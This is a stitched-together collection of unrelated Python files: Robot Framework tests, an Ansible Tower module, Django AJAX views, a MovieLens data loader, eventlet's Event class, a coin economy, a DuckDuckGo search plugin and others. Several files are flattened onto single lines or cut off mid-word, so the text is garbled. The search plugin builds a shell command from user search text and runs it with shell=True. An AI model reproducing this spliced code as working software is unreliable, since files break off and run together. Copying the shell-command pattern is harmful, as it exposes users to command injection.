        self.ctrl = TestCaseFileController(TestCaseFile()).tests

    def test_valid_name(self):
        self._validate_name(VALID_NAME, True)

    def test_empty_name(self):
        self._validate_name('', False)

    def test_name_with_only_whitespace(self):
        self._validate_name(' ', False)

    def test_duplicate_name(self):
        self.ctrl.new(VALID_NAME)
        # Robot name matching ignores case and treats '_' as ' ',
        # so all these variants collide with the existing test.
        self._validate_name(VALID_NAME, False)
        self._validate_name(VALID_NAME.upper(), False)
        self._validate_name(VALID_NAME.replace(' ', '_'), False)

    def test_duplicate_name_when_previous_name_known(self):
        ctrl = self.ctrl.new(VALID_NAME)
        # Renaming a test to (a variant of) its own name is allowed.
        self._validate_name(VALID_NAME, True, ctrl)
        self._validate_name(VALID_NAME.upper(), True, ctrl)
        self._validate_name(VALID_NAME.replace(' ', '_'), True, ctrl)

    def _validate_name(self, name, expected_valid, named_ctrl=None):
        # validate_name returns an object whose error_message is falsy
        # when the name is acceptable.
        valid = not bool(self.ctrl.validate_name(name, named_ctrl).error_message)
        assert_equals(valid, expected_valid)


class TestCaseCreationTest(unittest.TestCase):

    def setUp(self):
        self.ctrl = TestCaseFileController(TestCaseFile()).tests

    def test_whitespace_is_stripped(self):
        # Leading/trailing spaces, tabs and newlines are trimmed from
        # the stored test name.
        test = self.ctrl.new(' ' + VALID_NAME + '\t \n')
        assert_equals(test.name, VALID_NAME)


class LibraryImportListOperationsTest(unittest.TestCase):

    def setUp(self):
        # A plain function object is used as a minimal stub parent:
        # Python functions accept arbitrary attributes, which is all
        # the controller needs here (no mock framework required).
        self._parent = lambda:0
        self._parent.mark_dirty = lambda:0
        self._parent.datafile_controller = self._parent
        self._parent.update_namespace = lambda:0
        self._table = TestCaseFileSettingTable(lambda:0)
        self.ctrl = ImportSettingsController(self._parent, self._table)
        self._lib1 = self.ctrl.add_library('libbi1', '', '')
        self._lib2 = self.ctrl.add_library('libbi2', '', '')
        # Sanity check: imports appear in insertion order.
        self.assertEqual([self._lib1.name, self._lib2.name],
                         [l.name for l in self.ctrl])

    def test_move_up(self):
        self.ctrl.move_up(1)
        self.assertEqual([self._lib2.name, self._lib1.name],
                         [l.name for l in self.ctrl])

    def test_move_down(self):
        self.ctrl.move_down(0)
        self.assertEqual([self._lib2.name, self._lib1.name],
                         [l.name for l in self.ctrl])
#!/usr/bin/python
# coding: utf-8 -*-
# (c) 2017, Wayne Witzel III <wayne@riotousliving.com>
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software.  If not, see <http://www.gnu.org/licenses/>.

ANSIBLE_METADATA = {'metadata_version': '1.0',
                    'status': ['preview'],
                    'supported_by': 'community'}

DOCUMENTATION = '''
---
module: tower_job_launch
author: "Wayne Witzel III (@wwitzel3)"
version_added: "2.3"
short_description: Launch an Ansible Job.
description:
    - Launch an Ansible Tower jobs. See
      U(https://www.ansible.com/tower) for an overview.
options:
    job_template:
      description:
        - Name of the job_template to use.
      required: True
    job_explanation:
      description:
        - Job explanation field.
      default: null
    job_type:
      description:
        - Job_type to use for the job, only used if prompt for job_type is set.
      choices: ["run", "check", "scan"]
      default: null
    inventory:
      description:
        - Inventory to use for the job, only used if prompt for inventory is set.
      default: null
    credential:
      description:
        - Credential to use for job, only used if prompt for credential is set.
      default: null
    extra_vars:
      description:
        - Extra_vars to use for the job_template. Use '@' for a file.
      default: null
    limit:
      description:
        - Limit to use for the job_template.
      default: null
    tags:
      description:
        - Specific tags to use for from playbook.
      default: null
    use_job_endpoint:
      description:
        - Disable launching jobs from job template.
      default: False
extends_documentation_fragment: tower
'''

EXAMPLES = '''
- name: Launch a job
  tower_job_launch:
    job_template: "My Job Template"
  register: job
- name: Wait for job max 120s
  tower_job_wait:
    job_id: job.id
    timeout: 120
'''

RETURN = '''
id:
    description: job id of the newly launched job
    returned: success
    type: int
    sample: 86
status:
    description: status of newly launched job
    returned: success
    type: string
    sample: pending
'''

from ansible.module_utils.basic import AnsibleModule

try:
    import tower_cli
    import tower_cli.utils.exceptions as exc

    from tower_cli.conf import settings
    from ansible.module_utils.ansible_tower import (
        tower_auth_config,
        tower_check_mode,
        tower_argument_spec,
    )

    HAS_TOWER_CLI = True
except ImportError:
    HAS_TOWER_CLI = False


def main():
    """Resolve job_template/inventory/credential names to Tower ids and
    launch the job, reporting its id and initial status."""
    argument_spec = tower_argument_spec()
    # NOTE(review): DOCUMENTATION also lists job_explanation and
    # use_job_endpoint, which are not implemented in this spec -- confirm
    # against the intended tower-cli behaviour before adding them.
    argument_spec.update(dict(
        job_template=dict(required=True),
        job_type=dict(choices=['run', 'check', 'scan']),
        inventory=dict(),
        credential=dict(),
        limit=dict(),
        tags=dict(type='list'),
        extra_vars=dict(type='list'),
    ))

    module = AnsibleModule(
        argument_spec,
        supports_check_mode=True
    )

    if not HAS_TOWER_CLI:
        module.fail_json(msg='ansible-tower-cli required for this module')

    json_output = {}
    tags = module.params.get('tags')

    tower_auth = tower_auth_config(module)
    with settings.runtime_values(**tower_auth):
        tower_check_mode(module)
        try:
            params = module.params.copy()
            if isinstance(tags, list):
                # tower-cli expects a comma separated string of tags.
                params['tags'] = ','.join(tags)

            job = tower_cli.get_resource('job')

            lookup_fields = ('job_template', 'inventory', 'credential')
            for field in lookup_fields:
                name = params.pop(field, None)
                if not name:
                    # BUG FIX: optional prompt fields (inventory, credential)
                    # that were not supplied used to be looked up anyway with
                    # name=None, which can never be found and failed the run.
                    # Skip them instead of forwarding a bogus lookup.
                    continue
                try:
                    result = tower_cli.get_resource(field).get(name=name)
                    params[field] = result['id']
                except exc.NotFound as excinfo:
                    module.fail_json(msg='Unable to launch job, {0}/{1} was not found: {2}'.format(field, name, excinfo), changed=False)

            result = job.launch(no_input=True, **params)
            json_output['id'] = result['id']
            json_output['status'] = result['status']
        except (exc.ConnectionError, exc.BadRequest) as excinfo:
            module.fail_json(msg='Unable to launch job: {0}'.format(excinfo), changed=False)

    # fail_json exits, so reaching here implies `result` is bound.
    json_output['changed'] = result['changed']
    module.exit_json(**json_output)


if __name__ == '__main__':
    main()
# coding: utf-8
"""AJAX-aware generic form views: regular redirects for normal requests,
JSON payloads ({'status': ..., 'message': ...}) for XMLHttpRequests."""
from django.views.generic import CreateView, UpdateView, DeleteView
from django.http import HttpResponse, HttpResponseRedirect
from django.template.loader import render_to_string
from django.template import RequestContext
from django.core.serializers.json import DjangoJSONEncoder
from django.conf import settings

# Prefer the stdlib json; fall back to Django's bundled simplejson on
# ancient Pythons that lack it.
try:
    import json
except ImportError:
    from django.utils import simplejson as json


class JSONResponseMixin(object):
    """
    This is a slightly modified version from django-braces project
    (https://github.com/brack3t/django-braces)
    """
    content_type = None       # override to change the response MIME type
    json_dumps_kwargs = None  # extra kwargs forwarded to json.dumps

    def get_content_type(self):
        return self.content_type or u"application/json"

    def get_json_dumps_kwargs(self):
        if self.json_dumps_kwargs is None:
            self.json_dumps_kwargs = {}
        # Emit real UTF-8 instead of \uXXXX escapes.
        self.json_dumps_kwargs.setdefault(u'ensure_ascii', False)
        return self.json_dumps_kwargs

    def render_json_response(self, context_dict, status=200):
        """
        Limited serialization for shipping plain data.
        Do not use for models or other complex or custom objects.
        """
        json_context = json.dumps(
            context_dict,
            cls=DjangoJSONEncoder,
            **self.get_json_dumps_kwargs()
        ).encode(u'utf-8')
        return HttpResponse(
            json_context,
            content_type=self.get_content_type(),
            status=status
        )


class AjaxFormMixin(JSONResponseMixin):
    # Optional template rendered into the success message.
    message_template = None

    def pre_save(self):
        # Hook: runs after form.save(commit=False), before object.save().
        pass

    def post_save(self):
        # Hook: runs after the object (and m2m) has been saved.
        pass

    def form_valid(self, form):
        """
        If the request is ajax, save the form and return a json response.
        Otherwise return super as expected.
        """
        self.object = form.save(commit=False)
        self.pre_save()
        self.object.save()
        # commit=False skips m2m saving; do it explicitly for ModelForms.
        if hasattr(form, 'save_m2m'):
            form.save_m2m()
        self.post_save()
        if self.request.is_ajax():
            return self.render_json_response(self.get_success_result())
        return HttpResponseRedirect(self.get_success_url())

    def form_invalid(self, form):
        """
        We have errors in the form. If ajax, return them as json.
        Otherwise, proceed as normal.
        """
        if self.request.is_ajax():
            return self.render_json_response(self.get_error_result(form))
        return super(AjaxFormMixin, self).form_invalid(form)

    def get_message_template_context(self):
        # Both keys point at the saved object for template convenience.
        return {
            'instance': self.object,
            'object': self.object
        }

    def get_message_template_html(self):
        return render_to_string(
            self.message_template,
            self.get_message_template_context(),
            context_instance=RequestContext(self.request)
        )

    def get_response_message(self):
        message = ''
        if self.message_template:
            message = self.get_message_template_html()
        return message

    def get_success_result(self):
        return {'status': 'ok', 'message': self.get_response_message()}

    def get_error_result(self, form):
        # Re-render the whole form (with errors) so the client can swap it in.
        html = render_to_string(
            self.template_name,
            self.get_context_data(form=form),
            context_instance=RequestContext(self.request)
        )
        return {'status': 'error', 'message': html}


# Site-wide default form template, overridable via settings.
DEFAULT_FORM_TEMPLATE = getattr(settings, "FM_DEFAULT_FORM_TEMPLATE", "fm/form.html")


class AjaxCreateView(AjaxFormMixin, CreateView):
    template_name = DEFAULT_FORM_TEMPLATE


class AjaxUpdateView(AjaxFormMixin, UpdateView):
    template_name = DEFAULT_FORM_TEMPLATE


class AjaxDeleteView(JSONResponseMixin, DeleteView):
    def pre_delete(self):
        # Hook: runs just before the object is deleted.
        pass

    def post_delete(self):
        # Hook: runs just after the object is deleted.
        pass

    def get_success_result(self):
        return {'status': 'ok'}

    def delete(self, request, *args, **kwargs):
        """
        The same logic as in DeleteView but some hooks and JSON response
        in case of AJAX request
        """
        self.object = self.get_object()
        self.pre_delete()
        self.object.delete()
        self.post_delete()
        if self.request.is_ajax():
            return self.render_json_response(self.get_success_result())
        success_url = self.get_success_url()
        return HttpResponseRedirect(success_url)
from django.apps import AppConfig


class IndexConfig(AppConfig):
    """App configuration for the site's index application."""
    # Full dotted path of the application package.
    name = 'web.index'
import pandas as pd
from requests import get
from StringIO import StringIO          # Python 2 module; this file targets py2
from pandas.io.common import ZipFile


def get_movielens_data(local_file=None, get_genres=False):
    '''Downloads movielens data and stores it in pandas dataframe.
    '''
    # Either download the ml-1m archive or use a caller-supplied file object.
    if not local_file:
        #print 'Downloading data...'
        zip_file_url = 'http://files.grouplens.org/datasets/movielens/ml-1m.zip'
        zip_response = get(zip_file_url)
        zip_contents = StringIO(zip_response.content)
        #print 'Done.'
    else:
        zip_contents = local_file

    #print 'Loading data into memory...'
    with ZipFile(zip_contents) as zfile:
        zip_files = pd.Series(zfile.namelist())
        # First archive member whose name contains 'ratings'.
        zip_file = zip_files[zip_files.str.contains('ratings')].iat[0]
        zdata = zfile.read(zip_file)
        # 'latest' datasets ship a header row; the classic ml-1m does not.
        if 'latest' in zip_file:
            header = 0
        else:
            header = None
        delimiter = ','
        # ml-1m uses '::' as separator, which pandas' fast C engine cannot
        # parse; rewrite it to a single-character delimiter first.
        zdata = zdata.replace('::', delimiter)  # makes data compatible with pandas c-engine
        ml_data = pd.read_csv(StringIO(zdata), sep=delimiter, header=header, engine='c',
                              names=['userid', 'movieid', 'rating', 'timestamp'],
                              usecols=['userid', 'movieid', 'rating'])

        if get_genres:
            zip_file = zip_files[zip_files.str.contains('movies')].iat[0]
            with zfile.open(zip_file) as zdata:
                if 'latest' in zip_file:
                    delimiter = ','
                else:
                    delimiter = '::'
                # python engine: movie titles may contain commas / '::' quirks.
                genres_data = pd.read_csv(zdata, sep=delimiter, header=header, engine='python',
                                          names=['movieid', 'movienm', 'genres'])
            ml_genres = split_genres(genres_data)
            # NOTE(review): with get_genres=True the return type changes to a
            # (ratings, genres) tuple -- callers must handle both shapes.
            ml_data = (ml_data, ml_genres)

    return ml_data


def split_genres(genres_data):
    # Explode the pipe-separated genre string into one row per
    # (movie, genre) pair.
    genres_data.index.name = 'movie_idx'
    genres_stacked = genres_data.genres.str.split('|', expand=True).stack().to_frame('genreid')
    ml_genres = genres_data[['movieid', 'movienm']].join(genres_stacked).reset_index(drop=True)
    return ml_genres


def filter_short_head(data, threshold=0.01):
    # Rank movies by number of distinct raters (popularity), descending.
    short_head = data.groupby('movieid', sort=False)['userid'].nunique()
    short_head.sort_values(ascending=False, inplace=True)

    # Cumulative share of ratings vs. cumulative share of the catalogue.
    # NOTE(review): pd.np is deprecated in modern pandas; prefer importing
    # numpy directly when this file is ported.
    ratings_perc = short_head.cumsum()*1.0/short_head.sum()
    movies_perc = pd.np.arange(1, len(short_head)+1, dtype=pd.np.float64) / len(short_head)

    # Movies beyond the first `threshold` fraction of the catalogue.
    long_tail_movies = ratings_perc[movies_perc > threshold].index
    return long_tail_movies
""" Copyright (c) 2015 Michael Bright and Bamboo HR LLC Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from flask import Response from rapid.lib.version import Version from rapid.lib import api_key_required from rapid.lib.utils import UpgradeUtil class UpgradeController(object): def __init__(self, flask
_app): self.flask_app = flask_app def configure_routing(self): self.flask_app.add_url_rule('/api/upgrade/<path:version>', 'upgrade_master', api_key_required(self.upgrade_master), methods=['POST']) def upgrade_master(self, version): worked = UpgradeUtil.upgrade_version(version, self.flask_app.rapid_config) return Response("It worked!" if worked else "It didn't work, version
{} restored!".format(Version.get_version()), status=200 if worked else 505)
#!/usr/local/bin/python3
# Minimal CGI script that serves a static HTML article page.
# NOTE(review): `cgi` is imported but unused here -- kept in case the
# surrounding deployment relies on it (e.g. cgi.enable traceback tooling).
import cgi

# CGI response header; the blank line required between headers and body is
# provided by this print's newline plus the leading newline of the HTML block.
print("Content-type: text/html")
print('''
<!DOCTYPE html>
<html>
 <head>
  <title>Python</title>
 </head>
 <body>
  <h1>Python</h1>
  <p>Python</p>
  <p>This is the article for Python</p>
 </body>
</html>
''')
#    Copyright 2014 Red Hat, Inc.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import os
import socket
from unittest import mock

from oslotest import base as test_base

from oslo_service import systemd


class SystemdTestCase(test_base.BaseTestCase):
    """Test case for Systemd service readiness."""

    def test__abstractify(self):
        # A leading '@' names an abstract-namespace socket, which the
        # socket API represents with a leading NUL byte.
        sock_name = '@fake_socket'
        res = systemd._abstractify(sock_name)
        self.assertEqual('\0{0}'.format(sock_name[1:]), res)

    @mock.patch.object(os, 'getenv', return_value='@fake_socket')
    def _test__sd_notify(self, getenv_mock, unset_env=False):
        # Flags flipped by the fake socket below; asserted at the end.
        self.ready = False
        self.closed = False

        class FakeSocket(object):
            # Stand-in for socket.socket capturing the READY=1 handshake.
            # `fs` is this fake's own "self"; the outer `self` is the test.
            def __init__(self, family, type):
                pass

            def connect(fs, socket):
                pass

            def close(fs):
                self.closed = True

            def sendall(fs, data):
                if data == b'READY=1':
                    self.ready = True

        with mock.patch.object(socket, 'socket', new=FakeSocket):
            if unset_env:
                systemd.notify_once()
            else:
                systemd.notify()

            self.assertTrue(self.ready)
            self.assertTrue(self.closed)

    def test_notify(self):
        self._test__sd_notify()

    def test_notify_once(self):
        os.environ['NOTIFY_SOCKET'] = '@fake_socket'
        self._test__sd_notify(unset_env=True)
        # notify_once must remove NOTIFY_SOCKET from the environment.
        self.assertRaises(KeyError, os.environ.__getitem__, 'NOTIFY_SOCKET')

    @mock.patch("socket.socket")
    def test_onready(self, sock_mock):
        # READY=1 -> 0 (ready), empty -> 1 (not ready), timeout -> 2.
        recv_results = [b'READY=1', '', socket.timeout]
        expected_results = [0, 1, 2]
        for recv, expected in zip(recv_results, expected_results):
            if recv == socket.timeout:
                # An exception class as side_effect makes recv() raise it.
                sock_mock.return_value.recv.side_effect = recv
            else:
                sock_mock.return_value.recv.return_value = recv
            actual = systemd.onready('@fake_socket', 1)
            self.assertEqual(expected, actual)
from __future__ import print_function

from eventlet import hubs
from eventlet.support import greenlets as greenlet

__all__ = ['Event']


class NOT_USED:
    def __repr__(self):
        return 'NOT_USED'

# Module-level sentinel distinguishing "no result yet" from a result of None.
NOT_USED = NOT_USED()


class Event(object):
    """An abstraction where an arbitrary number of coroutines
    can wait for one event from another.

    Events are similar to a Queue that can only hold one item, but differ
    in two important ways:

    1. calling :meth:`send` never unschedules the current greenthread
    2. :meth:`send` can only be called once; create a new event to send again.

    They are good for communicating results between coroutines, and
    are the basis for how
    :meth:`GreenThread.wait() <eventlet.greenthread.GreenThread.wait>`
    is implemented.

    >>> from eventlet import event
    >>> import eventlet
    >>> evt = event.Event()
    >>> def baz(b):
    ...     evt.send(b + 1)
    ...
    >>> _ = eventlet.spawn_n(baz, 3)
    >>> evt.wait()
    4
    """
    # _result holds the sent value (NOT_USED until send() is called);
    # _exc holds the exception tuple to raise in waiters, if any.
    _result = None
    _exc = None

    def __init__(self):
        # Greenlets currently blocked in wait(), to be woken by send().
        self._waiters = set()
        self.reset()

    def __str__(self):
        params = (self.__class__.__name__, hex(id(self)),
                  self._result, self._exc, len(self._waiters))
        return '<%s at %s result=%r _exc=%r _waiters[%d]>' % params

    def reset(self):
        # this is kind of a misfeature and doesn't work perfectly well,
        # it's better to create a new event rather than reset an old one
        # removing documentation so that we don't get new use cases for it
        assert self._result is not NOT_USED, 'Trying to re-reset() a fresh event.'
        self._result = NOT_USED
        self._exc = None

    def ready(self):
        """ Return true if the :meth:`wait` call will return immediately.
        Used to avoid waiting for things that might take a while to time out.
        For example, you can put a bunch of events into a list, and then visit
        them all repeatedly, calling :meth:`ready` until one returns ``True``,
        and then you can :meth:`wait` on that one."""
        return self._result is not NOT_USED

    def has_exception(self):
        return self._exc is not None

    def has_result(self):
        return self._result is not NOT_USED and self._exc is None

    def poll(self, notready=None):
        # Non-blocking wait(): returns `notready` when no result is set yet.
        if self.ready():
            return self.wait()
        return notready

    # QQQ make it return tuple (type, value, tb) instead of raising
    # because
    # 1) "poll" does not imply raising
    # 2) it's better not to screw up caller's sys.exc_info() by default
    #    (e.g. if caller wants to calls the function in except or finally)
    def poll_exception(self, notready=None):
        if self.has_exception():
            return self.wait()
        return notready

    def poll_result(self, notready=None):
        if self.has_result():
            return self.wait()
        return notready

    def wait(self):
        """Wait until another coroutine calls :meth:`send`.
        Returns the value the other coroutine passed to :meth:`send`.

        >>> from eventlet import event
        >>> import eventlet
        >>> evt = event.Event()
        >>> def wait_on():
        ...    retval = evt.wait()
        ...    print("waited for {0}".format(retval))
        >>> _ = eventlet.spawn(wait_on)
        >>> evt.send('result')
        >>> eventlet.sleep(0)
        waited for result

        Returns immediately if the event has already occured.

        >>> evt.wait()
        'result'
        """
        current = greenlet.getcurrent()
        if self._result is NOT_USED:
            # Park this greenlet in the hub until send() schedules a wakeup;
            # discard() in finally also covers abnormal wakeups (throws).
            self._waiters.add(current)
            try:
                return hubs.get_hub().switch()
            finally:
                self._waiters.discard(current)
        if self._exc is not None:
            # Re-raise the stored exception in the waiter's context.
            current.throw(*self._exc)
        return self._result

    def send(self, result=None, exc=None):
        """Makes arrangements for the waiters to be woken with the
        result and then returns immediately to the parent.

        >>> from eventlet import event
        >>> import eventlet
        >>> evt = event.Event()
        >>> def waiter():
        ...     print('about to wait')
        ...     result = evt.wait()
        ...     print('waited for {0}'.format(result))
        >>> _ = eventlet.spawn(waiter)
        >>> eventlet.sleep(0)
        about to wait
        >>> evt.send('a')
        >>> eventlet.sleep(0)
        waited for a

        It is an error to call :meth:`send` multiple times on the same event.

        >>> evt.send('whoops')
        Traceback (most recent call last):
        ...
        AssertionError: Trying to re-send() an already-triggered event.

        Use :meth:`reset` between :meth:`send` s to reuse an event object.
        """
        assert self._result is NOT_USED, 'Trying to re-send() an already-triggered event.'
        self._result = result
        # Normalize a bare exception object into a 1-tuple for throw(*exc).
        if exc is not None and not isinstance(exc, tuple):
            exc = (exc, )
        self._exc = exc
        hub = hubs.get_hub()
        # Wake each waiter via the hub rather than switching directly, so
        # send() never unschedules the calling greenthread (see class doc).
        for waiter in self._waiters:
            hub.schedule_call_global(
                0, self._do_send, self._result, self._exc, waiter)

    def _do_send(self, result, exc, waiter):
        # Only deliver if the waiter is still blocked (it may have been
        # woken some other way between scheduling and this call).
        if waiter in self._waiters:
            if exc is None:
                waiter.switch(result)
            else:
                waiter.throw(*exc)

    def send_exception(self, *args):
        """Same as :meth:`send`, but sends an exception to waiters.

        The arguments to send_exception are the same as the arguments
        to ``raise``.  If a single exception object is passed in, it
        will be re-raised when :meth:`wait` is called, generating a
        new stacktrace.

           >>> from eventlet import event
           >>> evt = event.Event()
           >>> evt.send_exception(RuntimeError())
           >>> evt.wait()
           Traceback (most recent call last):
             File "<stdin>", line 1, in <module>
             File "eventlet/event.py", line 120, in wait
               current.throw(*self._exc)
           RuntimeError

        If it's important to preserve the entire original stack trace,
        you must pass in the entire :func:`sys.exc_info` tuple.

           >>> import sys
           >>> evt = event.Event()
           >>> try:
           ...     raise RuntimeError()
           ... except RuntimeError:
           ...     evt.send_exception(*sys.exc_info())
           ...
           >>> evt.wait()
           Traceback (most recent call last):
             File "<stdin>", line 1, in <module>
             File "eventlet/event.py", line 120, in wait
               current.throw(*self._exc)
             File "<stdin>", line 2, in <module>
           RuntimeError

        Note that doing so stores a traceback object directly on the
        Event object, which may cause reference cycles. See the
        :func:`sys.exc_info` documentation.
        """
        # the arguments and the same as for greenlet.throw
        return self.send(None, args)
from canvas.exceptions import ServiceError, ValidationError
from canvas.economy import InvalidPurchase
from drawquest import knobs
from drawquest.apps.palettes.models import get_palette_by_name, all_palettes
from drawquest.signals import balance_changed


def balance(user):
    """Return the user's current coin balance as an int (0 when unset)."""
    return int(user.kv.stickers.currency.get() or 0)

def _adjust_balance(user, amount):
    """Apply a signed coin delta to `user`.

    Credits increment unconditionally; debits use increment_ifsufficient so
    the balance can never go negative, raising InvalidPurchase when the user
    cannot afford the debit. Fires balance_changed and pushes the new
    balance to the user's realtime channel on success.
    """
    if amount >= 0:
        user.kv.stickers.currency.increment(amount)
    else:
        result = user.kv.stickers.currency.increment_ifsufficient(amount)
        if not result['success']:
            raise InvalidPurchase("Insufficient balance.")

    balance_changed.send(None, user=user)
    publish_balance(user)

def publish_balance(user):
    """Push the current balance over the user's realtime coin channel."""
    user.redis.coin_channel.publish({'balance': balance(user)})

def credit(user, amount):
    """Add `amount` coins to the user's balance."""
    _adjust_balance(user, amount)

def debit(user, amount):
    """Remove `amount` coins; raises InvalidPurchase if balance is too low."""
    _adjust_balance(user, -amount)

def credit_first_quest(user):
    credit(user, knobs.REWARDS['first_quest'])

def credit_quest_of_the_day_completion(user):
    credit(user, knobs.REWARDS['quest_of_the_day'])

def credit_archived_quest_completion(user):
    credit(user, knobs.REWARDS['archived_quest'])

def credit_personal_share(user):
    credit(user, knobs.REWARDS['personal_share'])

def credit_streak(user, streak):
    # Reward keys are e.g. 'streak_3'; raises KeyError for unknown streaks.
    credit(user, knobs.REWARDS['streak_{}'.format(streak)])

def credit_star(user):
    user.kv.stickers_received.increment(1)
    credit(user, knobs.REWARDS['star'])

def purchase_palette(user, palette):
    """Debit the palette's cost and unlock it for the user.

    `palette` may be a Palette object or a palette name. Raises
    InvalidPurchase when already owned or the balance is insufficient.
    """
    if isinstance(palette, basestring):
        # BUG FIX: previously called get_palette_by_name(palette_name) with
        # an undefined name, raising NameError whenever a palette was
        # passed by name instead of as an object.
        palette = get_palette_by_name(palette)

    if palette in user.redis.palettes:
        raise InvalidPurchase("You've already bought this palette.")

    debit(user, palette.cost)
    user.redis.palettes.unlock(palette)
blished by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ## Duck Duck Go search plugin by Clifton Mulkey ## Adapted from the Google Search plugin class CardapioPlugin(CardapioPluginInterface): author = _('Cardapio Team') name = _('DuckDuckGo') description = _('Perform quick DuckDuckGo searches') url = '' help_text = '' version = '1.0' plugin_api_version = 1.40 search_delay_type = 'remote' default_keyword = 'duck' category_name = _('DuckDuckGo Results') category_icon = 'system-search' icon = 'system-search' category_tooltip = _('Results found with DuckDuckGo') hide_from_sidebar = True def __init__(self, cardapio_proxy, category): self.c = cardapio_proxy try: from gio import File, Cancellable from urllib2 import quote from simplejson import loads from locale import getdefaultlocale from glib import GError except Exception, exception: self.c.write_to_log(self, 'Could not import certain modules', is_error=True) self.c.write_to_log(self, exception, is_error=True) self.loaded = False return self.File = File self.Cancellable = Cancellable self.quote = quote self.loads = loads self.getdefaultlocale = getdefaultlocale self.GError = GError self.query_url = r'http://www.duckduckgo.com/?q={0}&o=json' self.search_controller = self.Cancellable() self.action_command = "xdg-open 'http://duckduckgo.com/?q=%s'" self.action = { 'name': _('Show additional results'), 'tooltip': _('Show additional search results in your web browser'), 'icon name': 'system-search', 'type': 'callback', 'command': self.more_results_action, 'context menu': None, } 
self.loaded = True def search(self, text, result_limit): # TODO: I'm sure this is not the best way of doing remote procedure # calls, but I can't seem to find anything that is this easy to use and # compatible with gtk. Argh :( # TODO: we should really check if there's an interne
t connection before # proceeding... self.current_query = text text = self.quote(str(text)) # Is there a way to get the result_limit in the init method # so we don't have to assign it everytime search is called? self.result_limit = result_limit query = self.query_url.format(text) self.s
tream = self.File(query) self.search_controller.reset() self.stream.load_contents_async(self.handle_search_result, cancellable=self.search_controller) def cancel(self): if not self.search_controller.is_cancelled(): self.search_controller.cancel() def handle_search_result(self, gdaemonfile=None, response=None): # This function parses the results from the query # The results returned from DDG are a little convoluted # so we have to check for many different types of results here result_count = 0; try: response = self.stream.load_contents_finish(response)[0] except self.GError, e: # no need to worry if there's no response: maybe there's no internet # connection... self.c.handle_search_error(self, 'no response') return raw_results = self.loads(response) # print raw_results parsed_results = [] if 'Error' in raw_results: self.c.handle_search_error(self, raw_results['Error']) return # check for an abstract section try: if raw_results['Abstract']: item = { 'name': raw_results['Heading'], 'tooltip': '(%s) %s' % (raw_results['AbstractSource'], raw_results['AbstractText']), 'icon name': 'text-html', 'type': 'xdg', 'command': raw_results['AbstractURL'], 'context menu': None, } parsed_results.append(item) result_count += 1 except KeyError: pass # check for a definition section try: if raw_results['Definition']: item = { 'name': '%s (Definition)' % raw_results['Heading'], 'tooltip': '(%s) %s' % (raw_results['DefinitionSource'], raw_results['Definition']), 'icon name': 'text-html', 'type': 'xdg', 'command': raw_results['DefinitionURL'], 'context menu': None, } parsed_results.append(item) result_count += 1 except KeyError: pass # check for a related topics section try: if raw_results['RelatedTopics']: for raw_result in raw_results['RelatedTopics']: if result_count >= self.result_limit: break #some related topics have a 'Topics' sub list try: for result in raw_result['Topics']: if result_count >= self.result_limit: break item = { 'name': result['Text'], 'tooltip': 
result['FirstURL'], 'icon name': 'text-html', 'type': 'xdg', 'command': result['FirstURL'], 'context menu': None, } parsed_results.append(item) result_count += 1 except KeyError: #otherwise the RelatedTopic is a single entry item = { 'name': raw_result['Text'], 'tooltip': raw_result['FirstURL'], 'icon name': 'text-html', 'type': 'xdg', 'command': raw_result['FirstURL'], 'context menu': None, } parsed_results.append(item) result_count += 1 except KeyError: pass # check for external results section try: if raw_results['Results']: for raw_result in raw_results['Results']: if result_count >= self.result_limit: break item = { 'name': raw_result['Text'], 'tooltip': raw_result['FirstURL'], 'icon name': 'text-html', 'type': 'xdg', 'command': raw_result['FirstURL'], 'context menu': None, } parsed_results.append(item) result_count += 1 except KeyError: pass if parsed_results: parsed_results.append(self.action) self.c.handle_search_result(self, parsed_results, self.current_query) def more_results_action(self, text): text = text.replace("'", r"\'") text = text.replace('"', r'\"') try: subprocess.Popen(self.action_command % text, shell=True) except OSError, e: self.c.write_to_log(self, 'Error launching plugin action.', is_error=True) self.c.write
# Author: Mr_Orange <mr_orange@hotmail.it>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage.  If not, see <http://www.gnu.org/licenses/>.

import re
import json
from base64 import b64encode

import sickbeard

from .generic import GenericClient


class TransmissionAPI(GenericClient):
    """Torrent client driver speaking Transmission's JSON-RPC protocol."""

    def __init__(self, host=None, username=None, password=None):

        super(TransmissionAPI, self).__init__('Transmission', host, username, password)

        # Normalize host and rpcurl (set by GenericClient) so joining them
        # always yields "<host>/<rpcurl>/rpc" with single slashes.
        if not self.host.endswith('/'):
            self.host = self.host + '/'

        if self.rpcurl.startswith('/'):
            self.rpcurl = self.rpcurl[1:]

        if self.rpcurl.endswith('/'):
            self.rpcurl = self.rpcurl[:-1]
